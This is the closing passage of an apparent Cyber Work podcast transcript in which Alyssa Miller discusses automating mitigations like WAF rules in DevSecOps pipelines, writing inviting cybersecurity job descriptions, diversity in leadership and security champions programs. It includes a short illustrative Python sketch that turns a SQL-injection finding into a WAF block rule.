Better yet, what if you've also got other mitigations in your production environment? You've identified those things, so you know you can pass that on to the SREs and say, “All right. For this app, we've got to be aware of this type of attack against this.” Maybe as part of that, now you deploy a web application firewall rule, or a regular firewall rule, or whatever you've got to do; there are ways to put those mitigations in place to further reduce the risk. The point is you haven't stopped the pipeline from flowing. That's what's crucial here.

[00:40:36] CS: Got it. Yeah. Well, I live in Chicago, where we reversed a river, so I'm not opposed to -

[00:40:45] AM: That’s a little different.

[00:40:46] CS: A little different. A little different.

[00:40:47] AM: It does a lot of weird things.

[00:40:49] CS: Oh, yeah. Oh, tell me about it.

[00:40:51] AM: I mean, I got three words for you: Upper Wacker Drive. Chicago does weird things.

[00:40:58] CS: You apologize to Wacker Drive. It's a national treasure.

[00:41:01] AM: Come on, y'all in Chicago, you've done it to yourselves. I love y'all. Come on.

[00:41:06] CS: No, I know. I know. Okay. Again, like you said, with the automation love that security departments have, I imagine a lot of these mitigations that you could put in could also be automated, right? If you said, we know there's a vulnerability coming, put these gates up until the next micro-deployment comes, or whatever. Then [inaudible 00:41:30].

[00:41:30] AM: Isn’t that great? I mean, a lot of the vulnerabilities you're getting out of these tools are pretty standardized. I mean, it might show up in different places, but you can say, “All right. We now know that this, going back to the old days, this parameter is vulnerable to SQL injection or something like that.” Okay, that easily can translate, in an automated fashion, to: we're going to deploy a WAF rule that's watching this specific field for anything that might come through.
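A minimal sketch of that finding-to-rule translation might look like this — the rule format, field names, and finding types are all hypothetical, not the syntax of any real WAF:

```python
# Hypothetical virtual patching: translate a standardized scanner
# finding into a WAF rule watching the affected parameter.
def waf_rule_for(finding):
    """Return a block rule for finding types we know how to mitigate."""
    if finding["type"] == "sql_injection":
        return {
            "action": "block",
            "match_field": finding["parameter"],  # the vulnerable parameter
            "signature_set": "sql-injection",
        }
    return None  # no automatic mitigation known for this finding type

rule = waf_rule_for({"type": "sql_injection", "parameter": "user_id"})
print(rule)
```

In practice this mapping would be one automated step in the pipeline, so the mitigation lands in production alongside the still-vulnerable code rather than holding the deploy back.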

Now, I mean, it shouldn't be doing that anyway. I mean, it's probably not the best example, but we're going to watch for signatures of SQL injection on this field. Okay, so now you've got something there. And now you're limiting that whole concept of break the build, which is everything I just described, of hey, your results are not acceptable, we're breaking your build and sending you back. All right. Let's get better at that. This is where we get into one of those cliched terms, I'll say, that CISOs are using. Well, it's about business enablement.

Well, if you can speed up that pipeline, you now and security are part of business enablement. Reducing risk isn't business enablement. Making this faster, more efficient, more innovative, making more money, that's business enablement.

[00:42:54] CS: I love that. Also, all of these are great inversions, but that one especially feels like it could change the whole industry. I hope people are listening. I think that's amazing. Yeah.

[00:43:06] AM: We'll get there. I hope so. I mean, this is a message I've done a bazillion DevOps talks and DevSecOps talks on.

[00:43:16] CS: What is the feedback? I mean, are people resistant to this idea?

[00:43:19] AM: Yes. Oh, very much so. Look at the thread that we've been quoting this from, the number of people who came at me hard about it. They blasted me. Or the other thread I mentioned, the one with the phishing. I literally told people, “Here's how you identify phishing tests. Here's how you can never have to deal with them again. Here's how you bypass your screensaver.” I had security people – I mean, I'm surprised I wasn't getting death threats, as virulent as some of these people were. They were angry. I'm like, “Stop and think about it. If I'm saying it, you think that there aren't non-security people doing the exact same thing?”

It was a challenge to all of us, me included, in the security space to get better, and to analyze how the things that we do that are well-intentioned may actually be counterproductive, creating and encouraging behaviors that we don't want. That's the problem.

[00:44:14] CS: Yeah. Now, I feel like we could do an entire second episode on some of the corresponding stock terms we hear when discussing cybersecurity career advice and job hunting tips. You have phrases like, “If we can see your enthusiasm, we don't care if you have a degree.” It sounds great, but it isn't playing out in the real world, as evidenced by all the folks in the comments saying they have real experience and a pile of certs and don't get calls back on any job posting.

If the issue with the phrases in your tweet is abdication of accountability, the stock phrases on the employment side, I think, have a bright-siding quality. We're rolling out the red carpet, and we just don't know why no one's walked through the door yet. What are some antidotes to phrases like, “If you show enthusiasm, we’ll teach you the tools”? And how do we move to a system where that's actually true?

[00:44:58] AM: If I hear someone say that, the first thing I do is look at their job description. If that's got a laundry list of tools, I say, you're already doing it wrong. You're not living what you're saying. That's what we see. I told you, I did the research for the book. One of the questions I asked was, what is one thing you would say to somebody looking to get into the industry? There's one word that showed up more often than anything else: passion. Show your passion. Have passion.

People are not hiring on passion, no matter how much they claim they are, because we're putting out these massive job descriptions that list these laundry lists of different technologies and things that you have to know. Well, if we're saying, I just want to see your passion, I can teach you the technology, then why are those requirements there? Maybe list a few as nice-to-haves. People call it different things, but you've got the requirements, and then you've got the “this will be even better for this job” list. Put them in there. That, by the way, is also where certs should land.

I mean, you see, these things are hyper-focused. Basically, if I’m going to break this down, and this is the topic of a talk I've proposed to a conference, I'm hoping to give it: we spend a lot of time in our job descriptions telling people why they should not apply to our job. We put those lists in there. Here's all the things; if you don't have this, we're less interested in you. That's the thing. Again, unintended consequences of what we're doing. Instead, craft your job descriptions so that they encourage people to apply. Give them reasons to want to apply to that job.

Then if you don't trust me that this works: I've got a job posting out there right now that I'm in the process of hiring for. My strategy was that I wanted to make the job description as inviting as possible, to encourage people to apply. In less than a week, I had 80 qualified candidates for this job. Don't tell me you can't find cybersecurity people. They are out there. And I'm not even talking about entry-level jobs. If I open those up, I get massive numbers. I'm talking about a highly skilled position, because it's a leadership position, so I needed somebody with some of that experience. Unfortunately, in this case, I wasn't able to hire an entry-level person.

80 in less than a week. I mean, that tells you something. Because they see a job description that says, “Hey, you want to come work here. You may not feel you have all the skills, but here's why you would fit in this job.” Put that stuff in there. Tell them why those things that maybe they're not thinking about make them qualified. Rather than telling them, well, you need to have five years of experience writing queries in Splunk, and if you haven't done that, eh.

[00:48:12] CS: We don’t want to talk to you.

[00:48:13] AM: It doesn't get us anywhere.

[00:48:15] CS: Can you walk through some of the ways that you wrote that description, that inverted that?

[00:48:21] AM: Yeah. One of the big ones, and I learned this from a previous description, where I talked to the people I hired after the fact, is just pay attention to your job title. A lot of us, not all of us, but a lot of us, especially if we're not in government or DOD, that's all very different; they're a little stricter on this. A lot of us have the ability to put out a different business title than the HR title. I hired two people who are both associate directors, but I listed the job as a lead of application security. Why? Because the minute you put associate director and they see the word director, there's a lot of people who immediately run away from that. They go, “Oh, I'm not qualified for that.”

Now, I described the role exactly as it was. The other thing I did was I focused on what transferable skills they might have from a different job, maybe not even tech related, that would fit. In the narrative of the job, what it was going to do, a big paragraph or two or three at the top, I described that. Do you have this, this, this? Do you work well with these things? Do you do these things? If so, I want you, kind of thing, right? That's the thing that connects with them.

Like, oh, hey, I don't necessarily have all these weird technical things they're saying they want someone who's done. But I did that when I was – my favorite metaphor is when I was a barista at Starbucks. There's some really cool stuff that baristas at coffee shops have to do that really has applicability –

[00:49:56] CS: Translates really well. Yeah.

[00:49:59] AM: I mean, I built a whole TEDx Talk out of it. There was something valid there.

[00:50:03] CS: All right, everybody. That's your next assignment. Go check out the TEDx Talk from Alyssa Miller. Yeah, that's awesome. Thank you for breaking that down. We were talking about how we didn't know when this episode is going to drop; it'll probably drop in June, during Pride Month. The phrase “we are committed to diversity and inclusion,” as often said on corporate websites, and sometimes only in June, could stand to be picked apart. What does an industry truly passionate about diversity and inclusion look like? How do we move towards that with actual momentum, instead of playing catch-up from the 11 months where we weren't thinking about it?

[00:50:40] AM: Oh, my God. We could do a whole other show on this.

[00:50:43] CS: Sure.

[00:50:45] AM: You want to know if a company actually believes in that? Start with their leadership page. I've been doing this the last couple of weeks, because I've been having a lot of meetings with a lot of vendors. Before going into every one of those meetings, the very first thing I did was look at their leadership page. I will tell you, with multiple of them, they had a very monochromatic leadership team. That was something I brought up in the discussion.

I wish more people would do that, because – and here's what I tell them. If you cannot see the value that a diverse leadership team has in terms of business value, why that makes your company stronger, more profitable, everything else, then I don't trust you as a business. Because there is real business value. We don't do diversity just because it's nice, or it's right. I mean, those are very good reasons. We do it, because there is business value there. It actually makes our business stronger. It's demonstrated over and over again in studies.

The attempted counter I hear to this a lot is, well, we need diversity of thought. Okay, but you don't get diversity of thought if you're not getting the diversity of experiences that come from different races, different genders, different sexual orientations, all of those –

[00:52:01] CS: Narrative urgencies.

[00:52:03] AM: People who are neurodiverse, all of it. All of those different aspects we can think of that play into that. Okay. If you're not bringing those people into the mix, you can't say you have diversity of thought. Five old white men in a room are not giving you diversity of thought. I don't care how much experience they have. They've not been through the same things as –

[00:52:33] CS: Also, “diversity of thought.” I mean, I think that even goes higher on the list than “security is everyone's business” as a shut-the-conversation-down phrase.

[00:52:41] AM: Yes. Oh, it totally is. It's a total attempt to shut down the argument.

[00:52:44] CS: All I hear is stop talking about this. Please.

[00:52:50] AM: So yeah.

[00:52:51] CS: Yup. All right. As we wrap up today, we talked a bit about the book upfront. If you want to talk about any other projects that you have on the horizon that you'd like us to know about, or other cool things you're doing or whatever, tell us about it now.

[00:53:07] AM: Honestly, I don't know of anything in particular at the moment. I mean, I'm doing some cool stuff; we're building out a security champions program. I'm really hoping that that's going to turn into something very cool here soon. This is going to air after RSA; I'm giving a talk at RSA. I mean, I'm really hoping that the team I have assembled to work on the security champions program is going to come up with something really awesome. I'm already seeing some really, really creative and cool work.

I do hope in the longer term that I can even turn that into maybe some commentary on best practices and things. Because I did ask them to make a little bit of a departure from what we traditionally think of as security champions, where a lot of times it's all about training and stuff. We're definitely looking a lot broader than that. I know there's some organizations out there that have great security champions programs.

[00:54:06] CS: Yeah. Could you expand on that a little bit without giving the whole thing away?

[00:54:09] AM: Yeah. Basically, we're talking about embedding cybersecurity expertise in your engineering teams, your product teams, your operations and SRE teams, etc., etc. Developing that as its own community of people where they interact and they operate as a community of security champions, and then they go back. They're still developers. They're not cybersecurity people. They're still developers. They're still engineers. They're still working in those teams in that job capacity, but now they have that increased awareness and skill set around cybersecurity. That knowledge is now in the team, and that starts to build a true culture of what a colleague of mine calls a security empowered culture. Thank you, Jules [inaudible 00:54:59] for that, because I love that term. I told her, I was going to steal it from her.

[00:55:05] CS: Now here we are.

[00:55:06] AM: Use it with credit.

[00:55:08] CS: Yes, absolutely.

[00:55:09] AM: It’s a great term and I love it.

[00:55:12] CS: That's awesome. One last question. You gave that link up before for the book. If our listeners want to learn more about Alyssa Miller, where should they go online?

[00:55:21] AM: Twitter is easy, if you really want to learn about me, because I am for some reason really wide open about my life on Twitter. My website, I would love to say, go to my website, and you should, but I'm not great with keeping it up. I'm not going to lie. I blog every so often. That is alyssasec.com.

[00:55:49] CS: The book link again was – was it alyssa.link or alyssamiller.link/book?

[00:55:53] AM: It’s alyssa.link/book. It will take you to Manning’s site. The book is going to be out by the time this comes out. As of today, you can go and even start reading it before the book’s available; both the e-book and the physical book are going to be available by the time this actually airs. I definitely encourage people to take a look. Also, let me know what you think. If there are things I missed, or things you wish I would have included that I didn't, it wouldn't shock me if at some point down the road we do a second edition and update it with some of that stuff.

[00:56:30] CS: Cool. Maybe I'll have you back on and I'll do a book report on what I learned from it, if you want to be on a third time. Alyssa, thank you so much for your time and insights. It's always such a pleasure to talk to you.

[00:56:41] AM: Yeah, same here. I really appreciate it. Thanks for the time today, Chris.

[00:56:44] CS: As always, I'd like to thank everyone who is listening to and supporting Cyber Work. We've just about doubled our subscriptions in the last six months, and we really appreciate all the people who are very excited to hear us talk about this stuff. New episodes of the Cyber Work Podcast, as always, are available every Monday at 1 p.m. Central, both on video at our YouTube page and on audio wherever you get your podcasts. As always, if you want to learn cybersecurity for free, we have our InfoSec Skills platform; just go to infosecinstitute.com/free. You can get 10 free cybersecurity foundation courses from Keatron Evans, six cybersecurity leadership courses from Cicero Chimbanda, 11 courses on digital forensics, 11 on incident response, seven on security architecture, plus DevSecOps, Python for cybersecurity, JavaScript security, ICS and SCADA security fundamentals and more. Just go to infosecinstitute.com/free and start learning today.

Thank you once again to Alyssa Miller and thank you all so much for watching and listening. We'll speak to you next week.

[END]
